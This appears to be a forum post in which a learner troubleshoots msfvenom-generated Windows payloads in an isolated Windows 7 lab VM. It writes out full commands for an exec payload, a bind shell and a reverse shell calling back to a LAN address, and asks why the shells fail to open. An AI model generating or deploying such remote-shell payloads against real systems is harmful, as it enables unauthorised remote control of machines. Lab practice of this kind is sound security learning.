I've having some problems with my payloads.
I used msfvenom to generate the following payloads:
- msfvenom -a x86 -p windows/exec CMD=calc.exe -f exe > testcalc-windows-exec.exe
- msfvenom -p windows/shell/bind_tcp -f exe > windows-bind-tcp-4444.exe
- msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.187 LPORT=4000 -f exe > test-win-shell-reverse.exe
I place all 3 exe files into a windows 7 (unpatched) virtual machine--with no AV or Firewall.
(1) works perfectly fine, and calc.exe launches. Good.
(2) creates an open port, but when I login I don't get a shell (am I missing a parameter to bind to cmd or shell?) BAD.
(3) The 'attacked' computer calls back the attacking computer on 192.168.0.187, (i.e. I can see something connect to my listening ncat port, but nothing else). I can't seem to get a reverse shell---just a reverse connect, and nothing else. BAD.
am I missing something in (2) and (3), I want to run native shells first before proceeding to metepreter etc.